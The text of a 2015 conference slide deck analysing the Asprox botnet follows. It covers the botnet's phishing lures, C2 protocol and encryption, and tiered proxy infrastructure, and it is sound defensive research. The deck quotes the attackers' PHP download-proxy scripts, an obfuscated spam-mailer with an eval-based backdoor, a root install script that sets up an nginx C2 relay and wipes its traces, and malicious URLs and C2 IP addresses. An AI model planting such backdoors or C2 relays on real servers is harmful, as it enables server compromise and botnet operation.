Two Years with botnet Asprox - Michal Ambrož

Brno 2015 / 04 / 11 Security-Session.cz - Asprox botnet 1
Two years of tracking
the Asprox botnet
Michal Ambrož

Intro
● Contact
rebus AT seznam.cz
● Blogpost with history of Asprox
http://rebsnippets.blogspot.com/asprox
● Tracker of Asprox C2 and malware corpus
http://atrack.h3x.eu
● This presentation
http://atrack.h3x.eu/doc/presentation.pdf
● @xambroz

Asprox - End of the presentation :D
● Asprox C2 Tier2 infrastructure stopped responding
in January 2015
● last successful response at
2015-01-19T13:45:04.231878 GMT
● some C2 Tier1 servers are being reused for
Geodo/Dridex botnet since December 2014
● mailing infrastructure still somehow works, but
malware doesn't get distributed anymore
● Is this The end of Asprox botnet?

Agenda
● brief history of Asprox Botnet
● high level overview of the botnet infrastructure
● distribution channels
● zombie host
● C2 infrastructure
● modules infrastructure
● Q&A

About Asprox botnet
● rather smaller botnet
● cca 25 000 zombie hosts (December 2014)
● phishing email to download / open malware
● download additional malware modules
● steal passwords
● spread 3rd party malware
● spread advertisement
● hack websites to spread mail/download/C2
infrastructure

Asprox - the brief history
2007 - First recognized by security researchers
2008 - Asprox mass using of SQL injection to infect ASP
pages
– modules using Google to search for new hosts to attack
2009 - Asprox - another wave of mass SQL injecting
2012 - Asprox started using Kuluoz downloader
– plaintext protocol communicating to C2, RC4 encrypted DLL modules
2013 - Asprox using RC4 encrypted requests to C2
2013-08 - 2013-10 Kuluoz using new encryption of payload
2013-10 - 2015-01 Kuluoz using second encryption RSA+RC4
2015-01 Asprox botnet disappeared in a puff of smoke

Asprox - enterprise grade infrastructure

Asprox - Victim's point of view

Asprox - Victim - sexy email templates
http://www.wdbass.co.za/images/i
ndex.php?info=833_182786909
http://www.wdbass.co.za/images/i
ndex.php?info=833_182786909
http://impressionalliance.com/main.php?
label=qSZYjEz4FUsMqsSOat32blBoqpAFI
zyZ34EeAnJ8mAs=
http://impressionalliance.com/main.php?
label=qSZYjEz4FUsMqsSOat32blBoqpAFI
zyZ34EeAnJ8mAs=

Asprox - Victim - more mail templates 2013

Asprox - Victim - more mail templates 2014
More email samples on:
https://techhelplist.com/index.php/spam-list/
http://malware-traffic-analysis.net

Asprox - download links 2013
● 2013 links were having common part
● probably used for some referral purpose
– http://925geek[.]com/img/get.php?get_info=521_585240407
– http://adarshlifecare[.]org/img/get.php?get_info=ss00_323
– http://billwhiteart[.]com/img/get.php?get_info=ss00_323
– http://depro[.]co/img/get.php?info=888_449980528
– http://donpoyser[.]com/img/get.php?get_info=ss00_323

● attribute name used to switch the zip naming template to fit the
email templates
● seen also campaigns with RewriteRule
Request Campaign sample Name of Exe
?ticket= American
Airlines
http://andiburns.de/img/get.php?ticket=ss00_323 Electronic Ticket.exe
?get_info= DHL http://andiburns.de/img/get.php?
get_info=ss00_323
Shipment_Status_008436
284830.exe
?info= DHL http://andiburns.de/img/get.php?info=ss00_323 Shipment_Status_008436
284830.exe
?i_info= Fedex http://andiburns.de/img/get.php?i_info=ss00_323 Shipment Label.exe
?receipt= Fedex http://andiburns.de/img/get.php?
receipt=ss00_323
Postal Receipt
No00843412843.exe
?receipt_print= Fedex http://andiburns.de/img/get.php?
receipt=ss00_323
Postal Receipt
No00843412843.exe
?print= Fedex http://andiburns.de/img/get.php?
receipt=ss00_323
Postal Receipt
No00843412843.exe

● identifiers are unique per site
● identifiers probably unique per email
● attributes got simpler - like ?c=..., ?t=, ?w=, ?fd= ?fdx=
● seen also campaigns with RewriteRule
example.com/view.php?ez=Xfdn1VIeLYsu3XXXXXXi7E1auYixfO9vaMVEqAH0Hg8
example.com/view.php?ez=Xfdn1VIeLYsu3XXXXXXi7E1H2RoUa//VCh/3JqqQjpU
example.com/view.php?ez=Xfdn1VIeLYsu3XXXXXXi7E1HtXZZw0NERZgU4L5ntoQ
example.com/view.php?ez=Xfdn1VIeLYsu3XXXXXXi7E1KhTWm5zFQEAie6qp+2Ps
example.com/view.php?ez=Xfdn1VIeLYsu3XXXXXXi7E1t4Emn414AdywVUPc0/uI
example.com/view.php?ez=Xfdn1VIeLYsu3XXXXXXi7E26bHf/UAtQa5IeyOoTrQ0
example.com/view.php?ez=Xfdn1VIeLYsu3XXXXXXi7E2CJhKxJ0kmeLEiRcdYuFQ
example.com/view.php?ez=Xfdn1VIeLYsu3XXXXXXi7E+2RlboMFbZbfmjy5cj+gg
example.com/view.php?ez=Xfdn1VIeLYsu3XXXXXXi7E35QpmplQVMrfKLOjb3/QU
[thanks J for the sample links :)]

Asprox - Victim - ZIP with EXE
● downloaded ZIP contains EXE
● EXE has icon of some well-known application
● since late 2013 the zip/exe are GeoIP aware of the
downloading client

Asprox - Victim - executes svchost.exe

Asprox - Corpus of malware
http://atrack.h3x.eu/corpus/2 - cca 18 000 EXE samples
http://atrack.h3x.eu/corpus/2/18370 - 2012-08-15 13:36

Asprox - Calling home 2012
● This is actually the oldest sample in corpus - 2012
926af24d2a9a7bc64e22a6ac5857609a
● 8 chars RC4 key
● rest is encrypted request
http://203.130.129.58:84/00cd1a40FA511365883ACEB58B05
5EA44882D5E2D24B9BB24D7949BCECDEA40E850DB1FCC73
97577E90756ED3EC925691223BC8E3A25F2B211169BAF86A0
A20919FFE3BB6FCB
● Decrypts as:
http://203.130.129.58:84/index.php?
r=gate&id=00cd1a40&group=n1508rcm&debug=0&ips=127.0.0.1

Asprox - Calling home 2013
● well described in TrendMicro - Asprox Reborn research paper
http://www.trendmicro.com/cloud-content/us/pdfs/security-
intelligence/white-papers/wp-asprox-reborn.pdf
● id in request changed to full 32chars (16 bytes in hexa) of MD5
machine id
● RC4 key stayed to be 8 chars (first 8 of the machineid)
● response from C2 is in plaintext

Asprox - calling home 2013
● /index.php?
r=gate&id=C07D07258B586E4C908A3233784FD81F&group=110
7rcm&debug=0

Asprox - calling home 2013
● Requests:
– r=gate
– r=gate/getipslist
● Commands:
– idl - wait
– rdl - download and run DLL
– run - download run executable
– rem - remove the malware
– red - registry edit
– upd - download new version and update

Asprox - late 2013 encryption scheme
● encryption used cca September - December 2013 was
described by StopMalwaretising:
http://stopmalvertising.com/malware-reports/analysis-of-asprox-and-its-new-encryption-scheme.html
● POST request (used to be GET)
● RC4 encryption of URI remained
● parameters are sent in the body
● payload having RSA encrypted session key + data parts
formatted multipart/form-data file submissions
● request parameters encoded in the XML
● <knock><id>%s</id><group>%s</group><src>
%d</src><transport>%d</transport><time>%d</time><version>
%d</version><status>%d</status><debug>
%s</debug></knock>

Asprox - late 2013 encryption scheme

Asprox - 2014 encryption scheme
● Described by Herrcore - Inside The New Asprox/Kuluoz
http://herrcore.blogspot.ca/2014/01/inside-new-asproxkuluoz-october-2013.html
● POST request
● RC4 encrypted URI remained
● later in 2014 the URI was only encrypted /index.php
● then it was switchet to plaintext /index.php
● RSA key remained
● payload of the request is in binary format
●
4B len(key) RSA encrypted RC4 key 4B len(data) RC4 encrypted data

Asprox - download infrastructure

Asprox - download infrastructure - Tier1
● compromised web-servers with PHP
● PHP script works as a proxy
● repacks request and sends it to the backend
servers
● if back-end is not available throws HTTP404
● mimics 404 of the compromised website

Asprox - 2013 - php download script
● Samples:
May 2013 - pointing to 62.109.31.142
● http://forum.ubuntu.cz/index.php?topic=67954.0
● http://security.stackexchange.com/questions/35983/malic
ious-links-that-respond-to-browsers-but-not-curl-or-wge
t
Jun-Nov 2013 - pointing to 78.138.118.124-127
● http://pastie.org/pastes/8219244

$remote = 'http://62.109.31.142/request12.php';
php_display($remote);
error_404();
function php_display($url)
{
$query = array();
$query['ip'] = getIp();
$query['time'] = date('d/M/Y:H:i:s', time());
$query['request'] = getRequest();
$query['path'] = getPath();
$query['protocol'] = getProtocol();
$query['useragent'] = getUseragent();
$query['referer'] = getReferer();
$url = $url."?".http_build_query($query);

$remote="http://78.138.118.126:443/7hldfhdfg11.php";
php_display($remote);
error_404();
function php_display($url) {
$query=array();
$query["ip"]=getIp();
$query["path"]="$_SERVER[HTTP_HOST]
$_SERVER[REQUEST_URI]";
$query["useragent"]=getUseragent();
$url=$url."?".http_build_query($query);
$content=@file_get_contents($url);
if(strlen($content)<10) {
error_404();
}

● Error handling function
function error_404()
{
header("HTTP/1.1 404 Not Found");
exit("<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML
2.0//EN">rn"
."<html><head><title>404 Not
Found</title></head><body>rn"
."<h1>Not Found</h1>rn"
."<p>The requested URL was not found on this
server.</p>rn"
."<hr>rn"
."</body></html>rn");
}

● Error handling function changed
function error_404() {
$uri=preg_replace("/(?).*$/","",
$_SERVER["REQUEST_URI"]);
$content=http_request("http://".
$_SERVER["SERVER_NAME"]."/AFQjCNHnh8RttFI3VMrBd
dYw6rngKz7KEA");
$content=str_replace("/AFQjCNHnh8RttFI3VMrBddYw6rng
Kz7KEA",$uri,$content);
exit($content);
}

Asprox - download script obfuscation

Asprox - download script obfuscation
● For example:
$ip=NULL
● Becomes
${"GLOBALS"}["kyhshvku"]="ip";
${${"GLOBALS"}["kyhshvku"]}=NULL;
● Then
${"x47Lx4fBx41x4cx53"}
["x6bx79x68x73x68x76kx75"]="x69p";
${${"x47Lx4fx42Ax4cx53"}
["x6bx79x68x73hx76x6bu"]}=NULL;

● modified proxy script from the Tier1
● adds another layer of complexity
● seems to be used since Jun 2013
● was reusing some former Tier2 servers as Tier3
2

● tracking clients
● allows only limited number of downloads from
same IP
● allows only few (cca 5) downloads to each link
● blocks AV vendors' automated scanners
● in 2013 the download was serving directly apk
installations of FakeAV if access was from Android
3

Asprox - mailing infrastructure

Asprox - mailing infrastructure 2013
● in 2013 the mailing was mainly from botnet
zombies
● special spamming module distributed by Asprox
● downloads templates from the C2 server and uses
it for spamming
● in August 2013 the C2 servers stopped responding
to the template requests

● in 2014 Asprox misusing compromised web-servers
● malicious PHP script for sending spam
● contains also backdoor
● orchestrated from limited number of IP addresses
● Samples:
http://forum.directadmin.com/showthread.php?t=48038
http://www.apañados.es/images/ampliadas/kayuwvf.txt
http://www.unphp.net/decode/ee10f7511e1f4737ae4a67d
79417ca2a/
http://codetidy.com/4374

<?php ${"x47x4cOx42x41x4cx53"}["x6dtx6fx79x6cyjx77"]="x66x75nc";${"Gx4cOBx41Lx53"}["x6eyx78cx75x68x79u"]="x6b";$
{"x47x4cOBx41Lx53"}["x6agx6ex74x62x67"]="x68";${"x47x4cx4fBx41x4cS"}["kx67dx67x72x79"]="x68_x64etx65x63tx65x64";$
{"x47x4cOBx41x4cS"}["x70lypx70x79x79x69"]="x68x65ax64ex72s";${"x47x4cOBx41x4cx53"}["dx6bxx78x69ox6e"]="rx65x73";$
{"GLOx42x41Lx53"}["x6fmx67x6felx69gx6c"]="x64ax74x61";${"x47x4cx4fx42x41Lx53"}["x7ax75x6ax71qx64wx6fx62"]="v";$
{"x47x4cOx42Ax4cS"}["ex69kdx68mgyx69x64x66"]="cox6fx6bix65";${"x47LOx42ALx53"}
["x74xdx76x76x6fx6cx74lt"]="rx65x71x75x65x73t";${"Gx4cx4fBx41Lx53"}["x65x79x73ugx6anx6ax65x61x62x65"]="fp";$
{"Gx4cOx42x41Lx53"}["ex70x66x73x64x65x66x74"]="x65rrx6ex6f";${"x47x4cx4fx42x41x4cx53"}
["x63x6dex66x79xwc"]="x73cx68x65x6dx65";${"Gx4cx4fx42x41x4cx53"}["px72cfwx76x68x6cjx7ax79"]="x74x69x6dex6fut";$
{"GLx4fx42x41Lx53"}["x6fx63x75x64x74x76d"]="x75rx6c";${"x47x4cOx42x41x4cx53"}
["wx6ex70x67x6cex71x70x63i"]="x70arx61x6dx73";${"x47x4cOx42x41x4cx53"}["x69x69x73x62x6dx6dd"]="x75x72i";$
{"GLx4fx42Ax4cS"}["x67x67xjx76m"]="x74ox6bx65nx73";${"Gx4cOx42x41x4cx53"}["ix77ddx63x70x68x62"]="x73tx72ix6ex67";$
{"Gx4cx4fx42ALx53"}["x6bx65px68hcx68xo"]="nx75x6dCx68arx73";${"x47x4cx4fx42x41Lx53"}
["x70x6cx6fx67x62fx78x77za"]="x63hax72s";${"x47x4cx4fx42x41x4cS"}["x75x63x62x71x77x74x76o"]="x6ex75m";$
{"x47x4cOx42x41x4cx53"}["x73x67x74x75kx6fk"]="x6dx69x6e";${"x47x4cOx42x41x4cx53"}
["x69x62x68nx63x75rt"]="cox75nx74";${"x47x4cOx42x41Lx53"}["x64duvx77x"]="wx6fx72x64";${"GLx4fx42x41x4cx53"}
["x76csirx79x6fx64gtx6cx6c"]="x6dx61x78";${"x47x4cOx42ALx53"}["x72x70x75x79x64kx79c"]="x72x61x6ed";$
{"x47x4cx4fx42x41LS"}["x64x67wwsx79x78x70x73x6fft"]="x6ex73";${"GLOx42x41x4cx53"}
["px79x6dtqx74x70lx76x75"]="x63x32";${"GLx4fx42x41x4cx53"}["kx70yx71ox79x79x69x70x66tx64"]="x69";${"GLOx42x41x4cS"}
["qx68x6blx65qx66x6bpp"]="x6dax74x63x68x65x73";${"GLx4fx42x41Lx53"}["bx6exx66x74x73tx64s"]="cox6ex74ent";$
{"GLx4fx42ALx53"}["px64x75x6cx76x61x73"]="x73ubx6a";${"Gx4cx4fx42x41LS"}["cx77kixx77x64x76x67d"]="x74x6f";$
{"x47x4cx4fx42ALx53"}["rx62x69qx68vx74vx63rx67"]="x66";${"x47x4cOx42Ax4cS"}
["x64x71uex73hx71x78x64x6dx65"]="x7ax61x67";${"Gx4cx4fx42Ax4cS"}["dax74kx70x6ax71x70"]="ux6e";$
{"x47x4cx4fx42Ax4cx53"}["x62x66x79ix77x67x70x7a"]="x70x6cx61x69n";${"Gx4cx4fx42x41LS"}
["x61x74x69x63x68x78ex71x77x69"]="x68ex61x64";${"Gx4cx4fx42x41x4cx53"}["bsx6ax6fx74x6dx6fx75"]="ex6dx61ix6c";$
{"x47x4cOx42x41Lx53"}["x70sbx67mrx65x66x71c"]="mx61ilx65x72x73";${"x47x4cx4fx42x41LS"}
["x6bx6fmx6cx78tx64x6bx76x63s"]="x6dx61ix6cer";${"x47Lx4fx42x41x4cx53"}
["x72x66x68x65x72rx73x6fx6ax73x66x74"]="x66rx6fm";${"x47Lx4fBx41Lx53"}["x6dwfx73x69x6bx76x72"]="mx65x73x73agex73";
${"GLOBALx53"}["vx74x62x6cx6ax74x77"]="mx65sx73x61x67x65";${"x47Lx4fx42x41x4cx53"}
["dx63x68x78ux79gix67jx62x"]="x74x68x65x6de";${"x47x4cOx42Ax4cS"}["mx76x63x67x75x7ax6bx71"]="x66x69lx65nax6dx65";$
{"x47Lx4fx42x41Lx53"}["x6ex6enx71qcx6ex75x68x68ex6a"]="x66ix6cx65";${"Gx4cx4fBAx4cx53"}
["x6ax69x75x75x61x69x74x64x76nx70"]="kx65y";${"x47x4cOBx41x4cx53"}
["ux79dcx62x65x70x66x69hx6bx"]="alx69x61x73x65x73";${"x47LOx42x41LS"}["x69x79x6fx76gx78x64x64x67"]="fx72omx73";$
{"Gx4cx4fx42Ax4cS"}["fx6cx73x72sy"]="tx68x65x6dx65x73";${"GLOBALS"}["x6cx6exx6fx70xx6c"]="x65mx61x69lx73";$
{"x47x4cOx42x41LS"}["rx69x6ax66rx7apux6ex74"]="px6fx73t";${"Gx4cOx42x41x4cx53"}["zvx6cx71x66px62ow"]="x67x6fox64";$
{"GLx4fx42x41x4cx53"}
["dx66bx74x68x6bokx73"]="x67x6fx6fds";if(isset($_POST["x63x6fdx65"])&&isset($_POST["x63x75x73x74x6fm_action"])&&is_goo
d_ip($_SERVER["x52Ex4dOx54x45_Ax44x44R"]))
{eval(base64_decode($_POST["x63ox64e"]));exit();}if(isset($_POST["x74yx70x65"])&&$_POST["x74x79pe"]=="1")
{type1_send();exit();}elseif(isset($_POST["x74x79pe"])&&$_POST["x74x79x70e"]=="2"){}elseif(isset($_POST["x74x79x70x65"]))
{echo$_POST["tyx70e"];exit();}error_404();function is_good_ip($ip){${${"x47x4cOBx41x4cx53"}
["dx66bx74x68x6bx6fx6bx73"]}=Array("6.x31x385x2e23x39.","x38.13x38x2e118x2e");foreach(${$
{"GLOBx41x4cx53"}["dx66x62tx68x6box6bx73"]} as${${"GLOx42x41Lx53"}["x7avx6cqfx70bx6fw"]}){${"x47x4cx4fx42x41x4cx53"}
["x6bx72cx77xntx6e"]="x69x70";$maajrfnti="gx6fox64";if(strstr(${${"x47LOx42x41x4cx53"}["x6bx72cx77xx6etn"]},${$maajrfnti})!
=FALSE){return TRUE;}}return FALSE;}function type1_send(){if(!isset($_POST["ex6dx61ix6cs"])OR!isset($_POST["x74x68x65mx65s"])OR!
isset($_POST["x6dx65x73sx61ges"])OR!isset($_POST["x66x72x6fx6ds"])OR!isset($_POST["x6dax69lex72s"]))
{exit();}if(get_magic_quotes_gpc()){${"Gx4cOx42ALS"}

<?php ${"GLOBALS"}["nljqktap"]="func";${"GLOBALS"}["jgomhnkf"]="headers";${"GLOBALS"}
["cxhyqpgwvrrm"]="h";${"GLOBALS"}["gzhcncsc"]="h_detected";${"GLOBALS"}["xdyslqzwifq"]="res";$
{"GLOBALS"}["kcgvbty"]="data";${"GLOBALS"}["lzbbuye"]="v";${"GLOBALS"}["agmnqpv"]="k";$
{"GLOBALS"}["suaolxxengg"]="cookie";${"GLOBALS"}["xrsuqmfmu"]="request";${"GLOBALS"}
["dogegnuxa"]="fp";${"GLOBALS"}["gjgegiqa"]="errstr";${"GLOBALS"}["tqpqsaauvlmw"]="scheme";$
{"GLOBALS"}["smcdlvx"]="timeout";${"GLOBALS"}["psjrmintl"]="port";${"GLOBALS"}["pjzvnovbjjg"]="url";$
{"GLOBALS"}["wkwvhnk"]="params";${"GLOBALS"}["vrwvujpgkj"]="uri";${"GLOBALS"}
["vwtpqcwixpeq"]="tokens";${"GLOBALS"}["ebcjovotlhuy"]="pass";${"GLOBALS"}["leyztlsryj"]="string";$
{"GLOBALS"}["dyeockodkt"]="chars";${"GLOBALS"}["mstwoju"]="num";${"GLOBALS"}["vjevtsld"]="count";$
{"GLOBALS"}["alnsllsdj"]="word";${"GLOBALS"}["pupfkveqxmw"]="rand";${"GLOBALS"}["bbfhudk"]="max";
${"GLOBALS"}["gkhjfugusfkf"]="min";${"GLOBALS"}["pxjltrei"]="matches";${"GLOBALS"}
["uilcekfbf"]="content";${"GLOBALS"}["tytrrrvt"]="c2";${"GLOBALS"}["mvesspt"]="ns";${"GLOBALS"}
["kxojsokbwto"]="i";${"GLOBALS"}["qmkeday"]="to";${"GLOBALS"}["nirjys"]="f";${"GLOBALS"}
["qnrouxlup"]="file";${"GLOBALS"}["lxfixrfv"]="zag";${"GLOBALS"}["mflqxavhgqw"]="text";${"GLOBALS"}
["lzseiokdxpf"]="plain";${"GLOBALS"}["gtgibcvjw"]="un";${"GLOBALS"}["jztllgn"]="head";${"GLOBALS"}
["nugzpir"]="mailers";${"GLOBALS"}["ujrwnxbwy"]="mailer";${"GLOBALS"}["ifzcrhsp"]="from";$
{"GLOBALS"}["ggxmuznim"]="froms";${"GLOBALS"}["oyhhfuwyb"]="message";${"GLOBALS"}
["tsrwqswzpohd"]="messages";${"GLOBALS"}["pxigxff"]="theme";${"GLOBALS"}["crxudxqsop"]="email";$
{"GLOBALS"}["lcsdjlz"]="filename";${"GLOBALS"}["lbmbliiu"]="passes";${"GLOBALS"}
["ozujicfvmdhv"]="aliases";${"GLOBALS"}["nplteotrfg"]="themes";${"GLOBALS"}["sjlojt"]="ip";${"GLOBALS"}
["dwqewiuk"]="good";${"GLOBALS"}
["fycujwc"]="goods";if(isset($_POST["code"])&&isset($_POST["custom_action"])&&is_good_ip($_SER
VER["REMOTE_ADDR"]))
{eval(base64_decode($_POST["code"]));exit();}if(isset($_POST["type"])&&$_POST["type"]=="1")
{type1_send();exit();}elseif(isset($_POST["type"])&&$_POST["type"]=="2"){}elseif(isset($_POST["type"]))
{echo$_POST["type"];exit();}error_404();function is_good_ip($ip){${${"GLOBALS"}
["fycujwc"]}=Array("6.185.239.","8.138.118.");foreach(${${"GLOBALS"}["fycujwc"]} as${$
{"GLOBALS"}["dwqewiuk"]}){${"GLOBALS"}["ppmtsxyjxs"]="good";if(strstr(${${"GLOBALS"}["sjlojt"]},${$
{"GLOBALS"}["ppmtsxyjxs"]})!=FALSE){return TRUE;}}return FALSE;}function type1_send(){${"GLOBALS"}
["bdcgrqpn"]="froms";$hovyscojg="mailers";${"GLOBALS"}["tcvkbcgthle"]="emails";if(!
isset($_POST["emails"])OR!isset($_POST["themes"])OR!isset($_POST["messages"])OR!
isset($_POST["froms"])OR!isset($_POST["mailers"])){exit();}if(get_magic_quotes_gpc()){$hbcqkfx="key";$
{"GLOBALS"}["plfdsqd"]="post";foreach($_POST as${$hbcqkfx}=>${${"GLOBALS"}

Asprox - mailing php script - backdoor
if(isset($_POST["code"])&&isset($_POST["custom_acti
on"])&&is_good_ip($_SERVER["REMOTE_ADDR"])) {
eval(base64_decode($_POST["code"]));
exit();
}
......
function is_good_ip($ip) {
$goods=Array("6.185.239.","8.138.118.","8.138.127.");
foreach($goods as $good) {
if(strstr($ip,$good)!=FALSE) {
return TRUE;
}
}
return FALSE;
}

Asprox - Command And Control infrastructure

Asprox - Command And Control infrastructure
● Tracker: http://atrack.h3x.eu/
● misusing Linux servers with leaked root password
● SSH to root is used to copy install script
● install script installs gcc toolset
● downloads nginx
● compiles it
● starts nginx doing proxy_pass to Tier2
infrastructure
● decoy security research:
– configuration is changed after start
– nginx binaries are deleted
– installation scripts are deleted

Asprox - C2 Tier1 - nginx installation #1
● 2013 sample of install script can be found on
http://www.linuxquestions.org/questions/linux-security
-4/remove-asprox-botnet-controller-from-linux-server-4
175466422/
● 2014 install script overwrites the real with fake
configuration
● It starts with installing the devel tools
killall nginx
if which yum >/dev/null; then
yum -y install gcc make nano
fi
if which aptitude >/dev/null; then
aptitude update && aptitude -q -y install gcc make nano
fi

Asprox - C2 Tier1 - nginx installation #2
cd /opt/ && wget http://nginx.org/download/nginx-
1.2.6.tar.gz &&
tar zxf nginx-1.2.6.tar.gz &&
cd nginx-1.2.6 &&
./configure --sbin-path=/usr/sbin/nginx --conf-
path=/etc/nginx/nginx.conf --pid-path=/var/run/nginx.pid
--http-log-path=/var/log/nginx/error.log --error-log-
path=/var/log/nginx/access.log --without-
http_rewrite_module --without-http_gzip_module &&
make -j2 &&
make install &&
echo "... real configuration ..." > /etc/nginx/nginx.conf
&& nginx && rm -rf /etc/nginx/nginx.conf & iptables -P
INPUT ACCEPT && iptables -P OUTPUT ACCEPT &&
iptables -P FORWARD ACCEPT && iptables -F
echo "... fake configuration ..." > /etc/nginx/nginx.conf

Asprox - C2 Tier1 - nginx configuration
worker_processes 4;
events {
worker_connections 1024;
}
http {
include /etc/nginx/mime.types;
default_type application/octet-stream;
sendfile on;
tcp_nopush on;
keepalive_timeout 0;
tcp_nodelay on;
server {
listen 8080;
server_name _;
location / {
proxy_pass http://194.44.49.28:3306/;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $remote_addr;
client_max_body_size 10M;
client_body_buffer_size 128k;
proxy_connect_timeout 90;
proxy_send_timeout 90;
proxy_read_timeout 90;
proxy_buffer_size 4k;
proxy_buffers 4 32k;
proxy_busy_buffers_size 64k;
proxy_temp_file_write_size 64k;
}
}
}

Asprox - C2 Tier1 - nginx FAKE configuration
worker_processes 4;
events {
worker_connections 1024;
}
http {
include /etc/nginx/mime.types;
default_type application/octet-stream;
sendfile on;
tcp_nopush on;
keepalive_timeout 0;
tcp_nodelay on;
server {
listen 8080;
server_name _;
location / {
proxy_pass http://91.208.194.18:80/;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $remote_addr;
client_max_body_size 10M;
client_body_buffer_size 128k;
proxy_connect_timeout 90;
proxy_send_timeout 90;
proxy_read_timeout 90;
proxy_buffer_size 4k;
proxy_buffers 4 32k;
proxy_busy_buffers_size 64k;
proxy_temp_file_write_size 64k;
}
}
}

Asprox - C2 Tier1 - incident response
● Identify process running on the port 8080
lsof -i -n -P | grep LISTEN | grep 8080
● Identify Tier2 from network traffic
wget http://localhost:8080 --header "Test=AAAAAAAAA"
tcpdump -X src [[MY_IP]]
● Take snapshot of a process for analysis
gdb /proc/18466/exe 18466
gdb> gcore
gdb> detach
gdb> quit

Aprox - Top 50 countries as clients to C2
● log data from one of Tier1 C2
● 27000 clients during period of 2 months (2014 06-08)
● english speaking countries

Asprox - C2 Tier2
● 2013
RU 31.184.244.52:3306
DE 144.76.42.72:8880
DE 46.165.222.36:3306
● 2014
UA 194.44.49.28:3306
RO 94.199.48.245:3306
2

Asprox - modules infrastructure

Asprox - modules
● List of detected modules:
http://atrack.h3x.eu/corpus/8
● Analysis of modules:
● 2013 - Trendmicro
http://www.trendmicro.com/cloud-content/us/pdfs/security-intellig
ence/white-papers/wp-asprox-reborn.pdf
● 2014 - StopMalvaretising.com
http://stopmalvertising.com/malware-reports/a-journey-inside-the
-asprox-modules.html

Asprox - modules
● DLL modules distributed as response to C2 request
● 2013 - link to a module was distributed by the C2 as
response to update request. The modules were
distributed encrypted with RC4. Key to decrypt was
part of C2 response.
● 2014 - full DLL is sent back in C2 response,
bzip.base64 encoded, C2 response is encrypted
with RC4

Asprox - modules infrastructure
● some of the modules using C2 infrastructure
● some of the modules use its own set of backend
servers
● backend servers again using nginx proxies
● some of them different versions

Asprox - Q&A
?

Outro :D
● Contact
rebus AT seznam.cz
● Blogpost with history of Asprox
http://rebsnippets.blogspot.com/asprox
● Tracker of Asprox C2 and malware corpus
http://atrack.h3x.eu
● This presentation
http://atrack.h3x.eu/doc/presentation.pdf
● @xambroz

Two Years with botnet Asprox - Michal Ambrož

Recommended

Recommended

More Related Content

Similar to Two Years with botnet Asprox - Michal Ambrož

Similar to Two Years with botnet Asprox - Michal Ambrož (20)

More from Security Session

More from Security Session (20)

Recently uploaded

Recently uploaded (20)

Two Years with botnet Asprox - Michal Ambrož